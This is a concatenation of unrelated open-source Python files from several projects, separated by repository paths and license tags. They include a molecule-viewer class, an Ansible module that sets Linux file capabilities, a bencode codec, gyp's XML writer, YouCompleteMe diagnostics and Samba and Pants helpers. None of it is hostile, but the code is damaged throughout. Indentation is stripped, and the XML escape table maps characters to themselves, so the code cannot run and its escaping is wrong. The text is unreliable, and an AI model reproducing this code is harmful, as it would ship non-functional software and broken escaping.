a_indices, a_dists = self.atom_picker.pick(x, y)
b_indices, b_dists = self.bond_picker.pick(x, y)
indices = list(itertools.chain(a_indices, b_indices))
#print 'A', a_indices, a_dists
#print 'B', b_indices, b_dists
# This applies only to visible atoms
visible_atoms = self.hidden_state['atoms'].invert().indices
#visible_atoms = (~self.hidden_state.atom_hidden_mask).nonzero()[0]
        if len(indices) == 0:
# Cancel selection
self.selection_state['atoms'] = Selection([], self.system.n_atoms)
self.selection_state['bonds'] = Selection([], self.system.n_bonds)
self.on_atom_selection_changed()
self.on_bond_selection_changed()
else:
# Determine the candidate
dist_a = a_dists[0] if a_indices else float('inf')
dist_b = b_dists[0] if b_indices else float('inf')
if dist_a < dist_b:
self.atom_clicked.emit(visible_atoms[a_indices[0]])
self.selection_state['atoms'] \
= self.selection_state['atoms'].subtract(
Selection([visible_atoms[a_indices[0]]],
self.system.n_atoms))
self.on_atom_selection_changed()
else:
# TODO: fix for visible bonds
self.bond_clicked.emit([b_indices[0]])
self.selection_state['bonds'] \
= self.selection_state['bonds'].subtract(
Selection([b_indices[0]], self.system.n_bonds))
self.on_bond_selection_changed()
self.viewer.widget.update()
def select(self, selections):
'''Make a selection in this
representation. BallAndStickRenderer support selections of
atoms and bonds.
To select the first atom and the first bond you can use the
following code::
from chemlab.mviewer.state import Selection
representation.select({'atoms': Selection([0], system.n_atoms),
'bonds': Selection([0], system.n_bonds)})
Returns the current Selection
'''
if 'atoms' in selections:
self.selection_state['atoms'] = selections['atoms']
self.on_atom_selection_changed()
if 'bonds' in selections:
self.selection_state['bonds'] = selections['bonds']
self.on_bond_selection_changed()
if 'box' in selections:
self.selection_state['box'] = selections['box']
return self.selection_state
def hide(self, selections):
'''Hide objects in this representation. BallAndStickRepresentation
support selections of atoms and bonds.
To hide the first atom and the first bond you can use the
following code::
from chemlab.mviewer.state import Selection
representation.hide({'atoms': Selection([0], system.n_atoms),
'bonds': Selection([0], system.n_bonds)})
Returns the current Selection of hidden atoms and bonds.
'''
if 'atoms' in selections:
self.hidden_state['atoms'] = selections['atoms']
self.on_atom_hidden_changed()
if 'bonds' in selections:
self.hidden_state['bonds'] = selections['bonds']
self.on_bond_hidden_changed()
if 'box' in selections:
self.hidden_state['box'] = box_s = selections['box']
if box_s.mask[0]:
if self.viewer.has_renderer(self.box_renderer):
self.viewer.remove_renderer(self.box_renderer)
else:
if not self.viewer.has_renderer(self.box_renderer):
self.viewer.add_renderer(self.box_renderer)
return self.hidden_state
def scale(self, selections, factor):
'''Scale the objects represented by *selections* up to a
certain *factor*.
'''
if 'atoms' in selections:
atms = selections['atoms'].mask
if factor is None:
self.scale_factors[atms] = 1.0
else:
self.scale_factors[atms] = factor
self.update_scale_factors(self.scale_factors)
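    # Illustrative usage (hypothetical `representation` and `system` objects):
    #
    #   sel = {'atoms': Selection([0], system.n_atoms)}
    #   representation.scale(sel, 2.0)   # double the displayed radius
    #   representation.scale(sel, None)  # reset the scale factor to 1.0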
def change_radius(self, selections, value):
'''Change the radius of each atom by a certain value
'''
if 'atoms' in selections:
atms = selections['atoms'].mask
if value is None:
self.radii_state.array[atms] = [vdw_radii.get(t) * 0.3 for t in self.system.type_array[atms]]
else:
self.radii_state.array[atms] = value
self.update_scale_factors(self.scale_factors)
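    # Illustrative usage: set an explicit radius (same units as the stored
    # radii), or pass None to restore the van der Waals-derived defaults.
    #
    #   representation.change_radius({'atoms': Selection([0], system.n_atoms)}, 0.5)
    #   representation.change_radius({'atoms': Selection([0], system.n_atoms)}, None)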
def change_color(self, selections, value):
'''Change the color of each atom by a certain value. *value*
should be a tuple.
'''
if 'atoms' in selections:
atms = selections['atoms'].mask
if value is None:
#self.radii_state.array[atms] = [vdw_radii.get(t) * 0.3 for t in self.system.type_array[atms]]
self.atom_colors.array[atms, 0:3] = [self.color_scheme.get(t, colors.deep_pink)[0:3]
for t in self.system.type_array[atms]]
else:
self.atom_colors.array[atms, 0:3] = value[0:3]
self.atom_renderer.update_colors(self.atom_colors.array)
self.on_atom_colors_changed() | gpl-3.0 |
KimNorgaard/ansible-modules-extras | system/capabilities.py | 79 | 6980 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Nate Coraor <nate@bx.psu.edu>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: capabilities
short_description: Manage Linux capabilities
description:
- This module manipulates files privileges using the Linux capabilities(7) system.
version_added: "1.6"
options:
path:
description:
- Specifies the path to the file to be managed.
required: true
default: null
capability:
description:
- Desired capability to set (with operator and flags, if state is C(present)) or remove (if state is C(absent))
required: true
default: null
aliases: [ 'cap' ]
state:
description:
- Whether the entry should be present or absent in the file's capabilities.
choices: [ "present", "absent" ]
default: present
notes:
- The capabilities system will automatically transform operators and flags
into the effective set, so (for example, cap_foo=ep will probably become
cap_foo+ep). This module does not attempt to determine the final operator
and flags to compare, so you will want to ensure that your capabilities
argument matches the final capabilities.
requirements: []
author: "Nate Coraor (@natefoo)"
'''
EXAMPLES = '''
# Set cap_sys_chroot+ep on /foo
- capabilities: path=/foo capability=cap_sys_chroot+ep state=present
# Remove cap_net_bind_service from /bar
- capabilities: path=/bar capability=cap_net_bind_service state=absent
'''
OPS = ( '=', '-', '+' )
# ==============================================================
import os
import tempfile
import re
class CapabilitiesModule(object):
platform = 'Linux'
distribution = None
def __init__(self, module):
self.module = module
self.path = module.params['path'].strip()
self.capability = module.params['capability'].strip().lower()
self.state = module.params['state']
self.getcap_cmd = module.get_bin_path('getcap', required=True)
self.setcap_cmd = module.get_bin_path('setcap', required=True)
self.capability_tup = self._parse_cap(self.capability, op_required=self.state=='present')
self.run()
def run(self):
current = self.getcap(self.path)
caps = [ cap[0] for cap in current ]
if self.state == 'present' and self.capability_tup not in current:
# need to add capability
if self.module.check_mode:
self.module.exit_json(changed=True, msg='capabilities changed')
else:
# remove from current cap list if it's already set (but op/flags differ)
current = filter(lambda x: x[0] != self.capability_tup[0], current)
# add new cap with correct op/flags
current.append( self.capability_tup )
self.module.exit_json(changed=True, state=self.state, msg='capabilities changed', stdout=self.setcap(self.path, current))
elif self.state == 'absent' and self.capability_tup[0] in caps:
# need to remove capability
if self.module.check_mode:
self.module.exit_json(changed=True, msg='capabilities changed')
else:
# remove from current cap list and then set current list
current = filter(lambda x: x[0] != self.capability_tup[0], current)
self.module.exit_json(changed=True, state=self.state, msg='capabilities changed', stdout=self.setcap(self.path, current))
self.module.exit_json(changed=False, state=self.state)
def getcap(self, path):
rval = []
cmd = "%s -v %s" % (self.getcap_cmd, path)
rc, stdout, stderr = self.module.run_command(cmd)
# If file xattrs are set but no caps are set the output will be:
# '/foo ='
# If file xattrs are unset the output will be:
# '/foo'
# If the file does not exist the output will be (with rc == 0...):
# '/foo (No such file or directory)'
if rc != 0 or (stdout.strip() != path and stdout.count(' =') != 1):
self.module.fail_json(msg="Unable to get capabilities of %s" % path, stdout=stdout.strip(), stderr=stderr)
if stdout.strip() != path:
caps = stdout.split(' =')[1].strip().split()
for cap in caps:
cap = cap.lower()
# getcap condenses capabilities with the same op/flags into a
# comma-separated list, so we have to parse that
if ',' in cap:
cap_group = cap.split(',')
cap_group[-1], op, flags = self._parse_cap(cap_group[-1])
for subcap in cap_group:
rval.append( ( subcap, op, flags ) )
else:
rval.append(self._parse_cap(cap))
return rval
def setcap(self, path, caps):
caps = ' '.join([ ''.join(cap) for cap in caps ])
cmd = "%s '%s' %s" % (self.setcap_cmd, caps, path)
rc, stdout, stderr = self.module.run_command(cmd)
if rc != 0:
self.module.fail_json(msg="Unable to set capabilities of %s" % path, stdout=stdout, stderr=stderr)
else:
return stdout
def _parse_cap(self, cap, op_required=True):
opind = -1
try:
i = 0
while opind == -1:
opind = cap.find(OPS[i])
i += 1
except:
if op_required:
self.module.fail_json(msg="Couldn't find operator (one of: %s)" % str(OPS))
else:
return (cap, None, None)
op = cap[opind]
cap, flags = cap.split(op)
return (cap, op, flags)
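# Worked examples of the parser above (a hedged sketch; the values are invented
# and the calls assume a CapabilitiesModule instance):
#   self._parse_cap('cap_net_raw+ep')                ->  ('cap_net_raw', '+', 'ep')
#   self._parse_cap('cap_chown', op_required=False)  ->  ('cap_chown', None, None)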
# ==============================================================
# main
def main():
# defining module
module = AnsibleModule(
argument_spec = dict(
path = dict(aliases=['key'], required=True),
capability = dict(aliases=['cap'], required=True),
state = dict(default='present', choices=['present', 'absent']),
),
supports_check_mode=True
)
CapabilitiesModule(module)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
timlinux/QGIS | python/plugins/processing/algs/grass7/ext/v_sample.py | 45 | 1398 | # -*- coding: utf-8 -*-
"""
***************************************************************************
v_sample.py
-----------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
def processInputs(alg, parameters, context, feedback):
if 'input' in alg.exportedLayers:
return
# We need to import the vector with v.in.ogr
# and we can use r.external for the raster
alg.loadVectorLayerFromParameter('input', parameters, context, feedback, False)
alg.loadRasterLayerFromParameter('raster', parameters, context, True)
alg.postInputs(context)
| gpl-2.0 |
lumig242/Hue-Integration-with-CDAP | desktop/core/ext-py/requests-2.10.0/requests/exceptions.py | 352 | 2776 | # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from .packages.urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
"""There was an ambiguous exception that occurred while handling your
request."""
def __init__(self, *args, **kwargs):
"""
Initialize RequestException with `request` and `response` objects.
"""
response = kwargs.pop('response', None)
self.response = response
self.request = kwargs.pop('request', None)
if (response is not None and not self.request and
hasattr(response, 'request')):
self.request = self.response.request
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class ConnectionError(RequestException):
"""A Connection error occurred."""
class ProxyError(ConnectionError):
"""A proxy error occurred."""
class SSLError(ConnectionError):
"""An SSL error occurred."""
class Timeout(RequestException):
"""The request timed out.
Catching this error will catch both
:exc:`~requests.exceptions.ConnectTimeout` and
:exc:`~requests.exceptions.ReadTimeout` errors.
"""
class ConnectTimeout(ConnectionError, Timeout):
"""The request timed out while trying to connect to the remote server.
Requests that produced this error are safe to retry.
"""
class ReadTimeout(Timeout):
"""The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
"""A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
"""Too many redirects."""
class MissingSchema(RequestException, ValueError):
"""The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
"""See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
""" The URL provided was somehow invalid. """
class ChunkedEncodingError(RequestException):
"""The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
"""Failed to decode response content"""
class StreamConsumedError(RequestException, TypeError):
"""The content for this response was already consumed"""
class RetryError(RequestException):
"""Custom retries logic failed"""
# Warnings
class RequestsWarning(Warning):
"""Base warning for Requests."""
pass
class FileModeWarning(RequestsWarning, DeprecationWarning):
"""
A file was opened in text mode, but Requests determined its binary length.
"""
pass
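# Illustrative handling of this hierarchy (a hedged sketch; these classes are
# normally reached as requests.exceptions.* and the URL below is made up):
#
#   import requests
#   try:
#       requests.get('https://example.invalid', timeout=0.5)
#   except requests.exceptions.ConnectTimeout:
#       pass  # connection never established; safe to retry per the docstring
#   except requests.exceptions.ReadTimeout:
#       pass  # server accepted the connection but sent no data in time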
| apache-2.0 |
Mhynlo/SickRage | lib/bencode/__init__.py | 13 | 3301 | # The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Petru Paler
from BTL import BTFailure
def decode_int(x, f):
f += 1
newf = x.index('e', f)
n = int(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(':', f)
n = int(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
while x[f] != 'e':
k, f = decode_string(x, f)
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError, ValueError):
raise BTFailure("not a valid bencoded string")
# if l != len(x):
# raise BTFailure("invalid bencoded value (data after valid prefix)")
return r
from types import StringType, IntType, LongType, DictType, ListType, TupleType
class Bencached(object):
__slots__ = ['bencoded']
def __init__(self, s):
self.bencoded = s
def encode_bencached(x,r):
r.append(x.bencoded)
def encode_int(x, r):
r.extend(('i', str(x), 'e'))
def encode_bool(x, r):
if x:
encode_int(1, r)
else:
encode_int(0, r)
def encode_string(x, r):
r.extend((str(len(x)), ':', x))
def encode_list(x, r):
r.append('l')
for i in x:
encode_func[type(i)](i, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k, v in ilist:
r.extend((str(len(k)), ':', k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[Bencached] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
try:
from types import BooleanType
encode_func[BooleanType] = encode_bool
except ImportError:
pass
def bencode(x):
r = []
encode_func[type(x)](x, r)
return ''.join(r)
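# Round-trip example (hedged; outputs traced by hand against the functions above):
#
#   >>> bencode({'spam': ['a', 1]})
#   'd4:spaml1:ai1eee'
#   >>> bdecode('d4:spaml1:ai1eee')
#   {'spam': ['a', 1]}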
| gpl-3.0 |
rcarauta/rcarauta-projects | node_modules/node-gyp/gyp/pylib/gyp/easy_xml.py | 1558 | 4945 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import os
def XmlToString(content, encoding='utf-8', pretty=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Visual Studio files have a lot of pre-defined structures. This function makes
it easy to represent these structures as Python data structures, instead of
having to create a lot of function calls.
Each XML element of the content is represented as a list composed of:
1. The name of the element, a string,
2. The attributes of the element, a dictionary (optional), and
3+. The content of the element, if any. Strings are simple text nodes and
lists are child elements.
Example 1:
<test/>
becomes
['test']
Example 2:
<myelement a='value1' b='value2'>
<childtype>This is</childtype>
<childtype>it!</childtype>
</myelement>
becomes
['myelement', {'a':'value1', 'b':'value2'},
['childtype', 'This is'],
['childtype', 'it!'],
]
Args:
content: The structured content to be converted.
encoding: The encoding to report on the first XML line.
pretty: True if we want pretty printing with indents and new lines.
Returns:
The XML content as a string.
"""
# We create a huge list of all the elements of the file.
xml_parts = ['<?xml version="1.0" encoding="%s"?>' % encoding]
if pretty:
xml_parts.append('\n')
_ConstructContentList(xml_parts, content, pretty)
# Convert it to a string
return ''.join(xml_parts)
def _ConstructContentList(xml_parts, specification, pretty, level=0):
""" Appends the XML parts corresponding to the specification.
Args:
xml_parts: A list of XML parts to be appended to.
specification: The specification of the element. See EasyXml docs.
pretty: True if we want pretty printing with indents and new lines.
level: Indentation level.
"""
# The first item in a specification is the name of the element.
if pretty:
indentation = ' ' * level
new_line = '\n'
else:
indentation = ''
new_line = ''
name = specification[0]
if not isinstance(name, str):
raise Exception('The first item of an EasyXml specification should be '
'a string. Specification was ' + str(specification))
xml_parts.append(indentation + '<' + name)
# Optionally in second position is a dictionary of the attributes.
rest = specification[1:]
if rest and isinstance(rest[0], dict):
for at, val in sorted(rest[0].iteritems()):
xml_parts.append(' %s="%s"' % (at, _XmlEscape(val, attr=True)))
rest = rest[1:]
if rest:
xml_parts.append('>')
all_strings = reduce(lambda x, y: x and isinstance(y, str), rest, True)
multi_line = not all_strings
if multi_line and new_line:
xml_parts.append(new_line)
for child_spec in rest:
# If it's a string, append a text node.
# Otherwise recurse over that child definition
if isinstance(child_spec, str):
xml_parts.append(_XmlEscape(child_spec))
else:
_ConstructContentList(xml_parts, child_spec, pretty, level + 1)
if multi_line and indentation:
xml_parts.append(indentation)
xml_parts.append('</%s>%s' % (name, new_line))
else:
xml_parts.append('/>%s' % new_line)
def WriteXmlIfChanged(content, path, encoding='utf-8', pretty=False,
win32=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Args:
content: The structured content to be written.
path: Location of the file.
encoding: The encoding to report on the first line of the XML file.
pretty: True if we want pretty printing with indents and new lines.
"""
xml_string = XmlToString(content, encoding, pretty)
if win32 and os.linesep != '\r\n':
xml_string = xml_string.replace('\n', '\r\n')
try:
xml_string = xml_string.encode(encoding)
except Exception:
xml_string = unicode(xml_string, 'latin-1').encode(encoding)
# Get the old content
try:
f = open(path, 'r')
existing = f.read()
f.close()
except:
existing = None
# It has changed, write it
if existing != xml_string:
f = open(path, 'w')
f.write(xml_string)
f.close()
_xml_escape_map = {
'"': '"',
"'": ''',
'<': '<',
'>': '>',
'&': '&',
'\n': '&#xA;',
'\r': '&#xD;',
}
_xml_escape_re = re.compile(
"(%s)" % "|".join(map(re.escape, _xml_escape_map.keys())))
def _XmlEscape(value, attr=False):
""" Escape a string for inclusion in XML."""
def replace(match):
m = match.string[match.start() : match.end()]
# don't replace single quotes in attrs
if attr and m == "'":
return m
return _xml_escape_map[m]
return _xml_escape_re.sub(replace, value)
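# Worked example tying the pieces together (a hedged sketch):
#
#   >>> XmlToString(['greeting', {'lang': 'en'}, 'hi'])
#   '<?xml version="1.0" encoding="utf-8"?><greeting lang="en">hi</greeting>'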
| mit |
mzl9039/YouCompleteMe | python/ycm/diagnostic_interface.py | 9 | 8419 | #!/usr/bin/env python
#
# Copyright (C) 2013 Google Inc.
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
from collections import defaultdict, namedtuple
from ycm import vimsupport
import vim
class DiagnosticInterface( object ):
def __init__( self, user_options ):
self._user_options = user_options
# Line and column numbers are 1-based
self._buffer_number_to_line_to_diags = defaultdict(
lambda: defaultdict( list ) )
self._next_sign_id = 1
self._previous_line_number = -1
self._diag_message_needs_clearing = False
self._placed_signs = []
def OnCursorMoved( self ):
line, _ = vimsupport.CurrentLineAndColumn()
line += 1 # Convert to 1-based
if line != self._previous_line_number:
self._previous_line_number = line
if self._user_options[ 'echo_current_diagnostic' ]:
self._EchoDiagnosticForLine( line )
def UpdateWithNewDiagnostics( self, diags ):
normalized_diags = [ _NormalizeDiagnostic( x ) for x in diags ]
self._buffer_number_to_line_to_diags = _ConvertDiagListToDict(
normalized_diags )
if self._user_options[ 'enable_diagnostic_signs' ]:
self._placed_signs, self._next_sign_id = _UpdateSigns(
self._placed_signs,
self._buffer_number_to_line_to_diags,
self._next_sign_id )
if self._user_options[ 'enable_diagnostic_highlighting' ]:
_UpdateSquiggles( self._buffer_number_to_line_to_diags )
if self._user_options[ 'always_populate_location_list' ]:
vimsupport.SetLocationList(
vimsupport.ConvertDiagnosticsToQfList( normalized_diags ) )
def _EchoDiagnosticForLine( self, line_num ):
buffer_num = vim.current.buffer.number
diags = self._buffer_number_to_line_to_diags[ buffer_num ][ line_num ]
if not diags:
if self._diag_message_needs_clearing:
# Clear any previous diag echo
vimsupport.EchoText( '', False )
self._diag_message_needs_clearing = False
return
vimsupport.EchoTextVimWidth( diags[ 0 ][ 'text' ] )
self._diag_message_needs_clearing = True
def _UpdateSquiggles( buffer_number_to_line_to_diags ):
vimsupport.ClearYcmSyntaxMatches()
line_to_diags = buffer_number_to_line_to_diags[ vim.current.buffer.number ]
for diags in line_to_diags.itervalues():
for diag in diags:
location_extent = diag[ 'location_extent' ]
is_error = _DiagnosticIsError( diag )
if location_extent[ 'start' ][ 'line_num' ] < 0:
location = diag[ 'location' ]
vimsupport.AddDiagnosticSyntaxMatch(
location[ 'line_num' ],
location[ 'column_num' ] )
else:
vimsupport.AddDiagnosticSyntaxMatch(
location_extent[ 'start' ][ 'line_num' ],
location_extent[ 'start' ][ 'column_num' ],
location_extent[ 'end' ][ 'line_num' ],
location_extent[ 'end' ][ 'column_num' ],
is_error = is_error )
for diag_range in diag[ 'ranges' ]:
vimsupport.AddDiagnosticSyntaxMatch(
diag_range[ 'start' ][ 'line_num' ],
diag_range[ 'start' ][ 'column_num' ],
diag_range[ 'end' ][ 'line_num' ],
diag_range[ 'end' ][ 'column_num' ],
is_error = is_error )
def _UpdateSigns( placed_signs, buffer_number_to_line_to_diags, next_sign_id ):
new_signs, kept_signs, next_sign_id = _GetKeptAndNewSigns(
placed_signs, buffer_number_to_line_to_diags, next_sign_id
)
# Dummy sign used to prevent "flickering" in Vim when last mark gets
# deleted from the buffer. The dummy sign prevents Vim from collapsing the
# sign column in that case.
# There's also a vim bug which causes the whole window to redraw in some
# conditions (vim redraw logic is very complex). But, somehow, if we place a
# dummy sign before placing other "real" signs, it will not redraw the
# buffer (patch to vim pending).
dummy_sign_needed = not kept_signs and new_signs
if dummy_sign_needed:
vimsupport.PlaceDummySign( next_sign_id + 1,
vim.current.buffer.number,
new_signs[ 0 ].line )
# We place only those signs that haven't been placed yet.
new_placed_signs = _PlaceNewSigns( kept_signs, new_signs )
# We use incremental placement, so signs that are already placed on the correct
# lines will not be deleted and placed again, which should improve performance
# when there are many diags. Signs that don't exist in the current diags are
# deleted.
_UnplaceObsoleteSigns( kept_signs, placed_signs )
if dummy_sign_needed:
vimsupport.UnPlaceDummySign( next_sign_id + 1, vim.current.buffer.number )
return new_placed_signs, next_sign_id
def _GetKeptAndNewSigns( placed_signs, buffer_number_to_line_to_diags,
next_sign_id ):
new_signs = []
kept_signs = []
for buffer_number, line_to_diags in buffer_number_to_line_to_diags.iteritems():
if not vimsupport.BufferIsVisible( buffer_number ):
continue
for line, diags in line_to_diags.iteritems():
for diag in diags:
sign = _DiagSignPlacement( next_sign_id,
line,
buffer_number,
_DiagnosticIsError( diag ) )
if sign not in placed_signs:
new_signs += [ sign ]
next_sign_id += 1
else:
# We use .index here because `sign` contains a new id, but
# we need the sign with the old id to unplace it later on.
# We won't be placing the new sign.
kept_signs += [ placed_signs[ placed_signs.index( sign ) ] ]
return new_signs, kept_signs, next_sign_id
def _PlaceNewSigns( kept_signs, new_signs ):
placed_signs = kept_signs[:]
for sign in new_signs:
# Do not set two signs on the same line, it will screw up storing sign
# locations.
if sign in placed_signs:
continue
vimsupport.PlaceSign( sign.id, sign.line, sign.buffer, sign.is_error )
placed_signs.append(sign)
return placed_signs
def _UnplaceObsoleteSigns( kept_signs, placed_signs ):
for sign in placed_signs:
if sign not in kept_signs:
vimsupport.UnplaceSignInBuffer( sign.buffer, sign.id )
def _ConvertDiagListToDict( diag_list ):
buffer_to_line_to_diags = defaultdict( lambda: defaultdict( list ) )
for diag in diag_list:
location = diag[ 'location' ]
buffer_number = vimsupport.GetBufferNumberForFilename(
location[ 'filepath' ] )
line_number = location[ 'line_num' ]
buffer_to_line_to_diags[ buffer_number ][ line_number ].append( diag )
for line_to_diags in buffer_to_line_to_diags.itervalues():
for diags in line_to_diags.itervalues():
# We also want errors to be listed before warnings so that errors aren't
# hidden by the warnings; Vim won't place a sign over an existing one.
diags.sort( key = lambda diag: ( diag[ 'location' ][ 'column_num' ],
diag[ 'kind' ] ) )
return buffer_to_line_to_diags
def _DiagnosticIsError( diag ):
return diag[ 'kind' ] == 'ERROR'
def _NormalizeDiagnostic( diag ):
def ClampToOne( value ):
return value if value > 0 else 1
location = diag[ 'location' ]
location[ 'column_num' ] = ClampToOne( location[ 'column_num' ] )
location[ 'line_num' ] = ClampToOne( location[ 'line_num' ] )
return diag
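# Clamping example (hedged): some engines report 0 or -1 for an unknown column,
# but Vim's APIs are 1-based, so {'column_num': 0} is normalized to column 1.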
class _DiagSignPlacement( namedtuple( "_DiagSignPlacement",
[ 'id', 'line', 'buffer', 'is_error' ] ) ):
# We want two signs that have different ids but the same location to compare
# equal. ID doesn't matter.
def __eq__( self, other ):
return ( self.line == other.line and
self.buffer == other.buffer and
self.is_error == other.is_error )
| gpl-3.0 |
jkstrick/samba | python/samba/tdb_util.py | 46 | 1491 | # Unix SMB/CIFS implementation.
# tdb util helpers
#
# Copyright (C) Kai Blin <kai@samba.org> 2011
# Copyright (C) Amitay Isaacs <amitay@gmail.com> 2011
# Copyright (C) Andrew Bartlett <abartlet@samba.org> 2013
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import samba
import subprocess
import os
def tdb_copy(file1, file2):
"""Copy tdb file using tdbbackup utility and rename it
"""
# Find the location of tdbbackup tool
dirs = ["bin", samba.param.bin_dir()] + os.getenv('PATH').split(os.pathsep)
for d in dirs:
toolpath = os.path.join(d, "tdbbackup")
if os.path.exists(toolpath):
break
tdbbackup_cmd = [toolpath, "-s", ".copy.tdb", file1]
status = subprocess.call(tdbbackup_cmd, close_fds=True, shell=False)
if status == 0:
os.rename("%s.copy.tdb" % file1, file2)
else:
raise Exception("Error copying %s" % file1)
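# Typical call (illustrative; both paths here are hypothetical):
#
#   tdb_copy('/var/lib/samba/private/secrets.tdb', '/tmp/secrets.tdb')
#
# tdbbackup writes "<file1>.copy.tdb" next to the source; a zero exit status
# lets us rename that backup into place as file2.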
| gpl-3.0 |
twitter/pants | tests/python/pants_test/engine/scheduler_test_base.py | 1 | 3880 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import shutil
from builtins import object
from pants.base.file_system_project_tree import FileSystemProjectTree
from pants.engine.nodes import Throw
from pants.engine.scheduler import Scheduler
from pants.option.global_options import DEFAULT_EXECUTION_OPTIONS
from pants.util.contextutil import temporary_file_path
from pants.util.dirutil import safe_mkdtemp, safe_rmtree
from pants_test.engine.util import init_native
class SchedulerTestBase(object):
"""A mixin for classes (tests, presumably) which need to create temporary schedulers.
TODO: In the medium term, this should be part of pants_test.test_base.TestBase.
"""
_native = init_native()
def _create_work_dir(self):
work_dir = safe_mkdtemp()
self.addCleanup(safe_rmtree, work_dir)
return work_dir
def mk_fs_tree(self, build_root_src=None, ignore_patterns=None, work_dir=None):
"""Create a temporary FilesystemProjectTree.
:param build_root_src: Optional directory to pre-populate from; otherwise, empty.
:returns: A FilesystemProjectTree.
"""
work_dir = work_dir or self._create_work_dir()
build_root = os.path.join(work_dir, 'build_root')
if build_root_src is not None:
shutil.copytree(build_root_src, build_root, symlinks=True)
else:
os.makedirs(build_root)
return FileSystemProjectTree(build_root, ignore_patterns=ignore_patterns)
def mk_scheduler(self,
rules=None,
union_rules=None,
project_tree=None,
work_dir=None,
include_trace_on_error=True):
"""Creates a SchedulerSession for a Scheduler with the given Rules installed."""
rules = rules or []
work_dir = work_dir or self._create_work_dir()
project_tree = project_tree or self.mk_fs_tree(work_dir=work_dir)
local_store_dir = os.path.realpath(safe_mkdtemp())
scheduler = Scheduler(self._native,
project_tree,
work_dir,
local_store_dir,
rules,
union_rules,
DEFAULT_EXECUTION_OPTIONS,
include_trace_on_error=include_trace_on_error)
return scheduler.new_session()
def context_with_scheduler(self, scheduler, *args, **kwargs):
return self.context(*args, scheduler=scheduler, **kwargs)
def execute(self, scheduler, product, *subjects):
"""Runs an ExecutionRequest for the given product and subjects, and returns the result value."""
request = scheduler.execution_request([product], subjects)
return self.execute_literal(scheduler, request)
def execute_literal(self, scheduler, execution_request):
returns, throws = scheduler.execute(execution_request)
if throws:
